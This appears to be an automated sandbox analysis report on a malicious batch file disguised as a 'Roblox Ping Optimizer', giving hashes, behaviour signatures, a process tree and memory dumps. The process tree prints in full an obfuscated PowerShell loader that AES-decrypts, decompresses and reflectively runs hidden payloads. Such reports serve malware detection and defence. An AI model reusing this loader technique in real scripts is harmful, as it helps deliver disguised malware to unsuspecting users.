Analysis

  • max time kernel
    52s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    27-06-2024 23:51

General

  • Target

    RobloxPingOptimizer.bat

  • Size

    273KB

  • MD5

    0d3e0553b13ae24b0e765dc71b71d157

  • SHA1

    2e7ea67463d79b9047aa843210667ac11da4650d

  • SHA256

    3d532f4155981fbaf60ddbaf14851a4b12d1066cbd182144ad0bdcd0b0f379a6

  • SHA512

    43b0250496746f8c161d3009f0842d2758eb80196ce7bc5e4f05a1ac552ae86ebece4fcb42a6b4f52be7981e01782817c56d12017d70c77e34327f63433a5da0

  • SSDEEP

    6144:ymjeUWzu9cgBXKz1IQDKHkaIFH4zfWHF0QR1rh3Og2q4E:yseUWq9cgBazioKkaIEfOFtR1rh3Z2S

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1wL4kmOdB2R3iGa/mEDXbQunvSUVKGrVuRrft2dp9pw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BFwaf2FXZug80opDTZLBSA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HKEwQ=New-Object System.IO.MemoryStream(,$param_var); $kVcOJ=New-Object System.IO.MemoryStream; $eLOZz=New-Object System.IO.Compression.GZipStream($HKEwQ, [IO.Compression.CompressionMode]::Decompress); $eLOZz.CopyTo($kVcOJ); $eLOZz.Dispose(); $HKEwQ.Dispose(); $kVcOJ.Dispose(); $kVcOJ.ToArray();}function execute_function($param_var,$param2_var){ $YpwEB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnPgt=$YpwEB.EntryPoint; $XnPgt.Invoke($null, $param2_var);}$tHcqT = 'C:\Users\Admin\AppData\Local\Temp\RobloxPingOptimizer.bat';$host.UI.RawUI.WindowTitle = $tHcqT;$AjwOC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tHcqT).Split([Environment]::NewLine);foreach ($vriJL in $AjwOC) { if ($vriJL.StartsWith('jwbKUUEoLPvvJlZYWdJd')) { $srAUX=$vriJL.Substring(20); break; }}$payloads_var=[string[]]$srAUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2020
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2360
    • C:\Windows\System32\fontview.exe
      "C:\Windows\System32\fontview.exe" C:\Users\Admin\Desktop\ResolveOpen.ttf
      1⤵
        PID:2540
      • C:\Windows\System32\fontview.exe
        "C:\Windows\System32\fontview.exe" C:\Users\Admin\Desktop\ResolveOpen.ttf
        1⤵
          PID:2600
        • C:\Program Files\VideoLAN\VLC\vlc.exe
          "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\TestRegister.3gp2"
          1⤵
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:2672
        • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
          "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde /n
          1⤵
          • Enumerates system info in registry
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: AddClipboardFormatListener
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          PID:2504
        • C:\Windows\System32\isoburn.exe
          "C:\Windows\System32\isoburn.exe" "C:\Users\Admin\Desktop\MergeMount.iso"
          1⤵
            PID:2736

Network

MITRE ATT&CK Enterprise v15


Downloads

  • memory/2360-2-0x0000000074521000-0x0000000074522000-memory.dmp (Filesize: 4KB)
  • memory/2360-3-0x0000000074520000-0x0000000074ACB000-memory.dmp (Filesize: 5.7MB)
  • memory/2360-4-0x0000000074520000-0x0000000074ACB000-memory.dmp (Filesize: 5.7MB)
  • memory/2360-6-0x0000000074520000-0x0000000074ACB000-memory.dmp (Filesize: 5.7MB)
  • memory/2360-5-0x0000000074520000-0x0000000074ACB000-memory.dmp (Filesize: 5.7MB)
  • memory/2360-7-0x0000000074520000-0x0000000074ACB000-memory.dmp (Filesize: 5.7MB)
  • memory/2504-14-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2672-16-0x000007FEF79E0000-0x000007FEF7A14000-memory.dmp (Filesize: 208KB)
  • memory/2672-15-0x000000013F1D0000-0x000000013F2C8000-memory.dmp (Filesize: 992KB)
  • memory/2672-17-0x000007FEF6920000-0x000007FEF6BD4000-memory.dmp (Filesize: 2.7MB)
  • memory/2672-18-0x000007FEF8370000-0x000007FEF8388000-memory.dmp (Filesize: 96KB)
  • memory/2672-20-0x000007FEF79A0000-0x000007FEF79B1000-memory.dmp (Filesize: 68KB)
  • memory/2672-21-0x000007FEF7980000-0x000007FEF7997000-memory.dmp (Filesize: 92KB)
  • memory/2672-24-0x000007FEF7920000-0x000007FEF7931000-memory.dmp (Filesize: 68KB)
  • memory/2672-23-0x000007FEF7940000-0x000007FEF795D000-memory.dmp (Filesize: 116KB)
  • memory/2672-22-0x000007FEF7960000-0x000007FEF7971000-memory.dmp (Filesize: 68KB)
  • memory/2672-19-0x000007FEF79C0000-0x000007FEF79D7000-memory.dmp (Filesize: 92KB)
  • memory/2672-25-0x000007FEF5740000-0x000007FEF67EB000-memory.dmp (Filesize: 16.7MB)
  • memory/2672-26-0x000007FEF5540000-0x000007FEF5740000-memory.dmp (Filesize: 2.0MB)
  • memory/2672-28-0x000007FEF7030000-0x000007FEF7051000-memory.dmp (Filesize: 132KB)
  • memory/2672-30-0x000007FEF6FF0000-0x000007FEF7001000-memory.dmp (Filesize: 68KB)
  • memory/2672-32-0x000007FEF6FB0000-0x000007FEF6FC1000-memory.dmp (Filesize: 68KB)
  • memory/2672-31-0x000007FEF6FD0000-0x000007FEF6FE1000-memory.dmp (Filesize: 68KB)
  • memory/2672-33-0x000007FEF6F90000-0x000007FEF6FAB000-memory.dmp (Filesize: 108KB)
  • memory/2672-38-0x000007FEF5430000-0x000007FEF549F000-memory.dmp (Filesize: 444KB)
  • memory/2672-42-0x000007FEF5350000-0x000007FEF5374000-memory.dmp (Filesize: 144KB)
  • memory/2672-47-0x000007FEF2C70000-0x000007FEF2C87000-memory.dmp (Filesize: 92KB)
  • memory/2672-46-0x000007FEF52C0000-0x000007FEF52D2000-memory.dmp (Filesize: 72KB)
  • memory/2672-45-0x000007FEF52E0000-0x000007FEF52F1000-memory.dmp (Filesize: 68KB)
  • memory/2672-44-0x000007FEF5300000-0x000007FEF5323000-memory.dmp (Filesize: 140KB)
  • memory/2672-43-0x000007FEF5330000-0x000007FEF5347000-memory.dmp (Filesize: 92KB)
  • memory/2672-41-0x000007FEF5380000-0x000007FEF53A8000-memory.dmp (Filesize: 160KB)
  • memory/2672-40-0x000007FEF53B0000-0x000007FEF5406000-memory.dmp (Filesize: 344KB)
  • memory/2672-39-0x000007FEF5410000-0x000007FEF5421000-memory.dmp (Filesize: 68KB)
  • memory/2672-37-0x000007FEF54A0000-0x000007FEF5507000-memory.dmp (Filesize: 412KB)
  • memory/2672-36-0x000007FEF5510000-0x000007FEF5540000-memory.dmp (Filesize: 192KB)
  • memory/2672-35-0x000007FEF6F50000-0x000007FEF6F68000-memory.dmp (Filesize: 96KB)
  • memory/2672-34-0x000007FEF6F70000-0x000007FEF6F81000-memory.dmp (Filesize: 68KB)
  • memory/2672-29-0x000007FEF7010000-0x000007FEF7028000-memory.dmp (Filesize: 96KB)
  • memory/2672-27-0x000007FEF78E0000-0x000007FEF791F000-memory.dmp (Filesize: 252KB)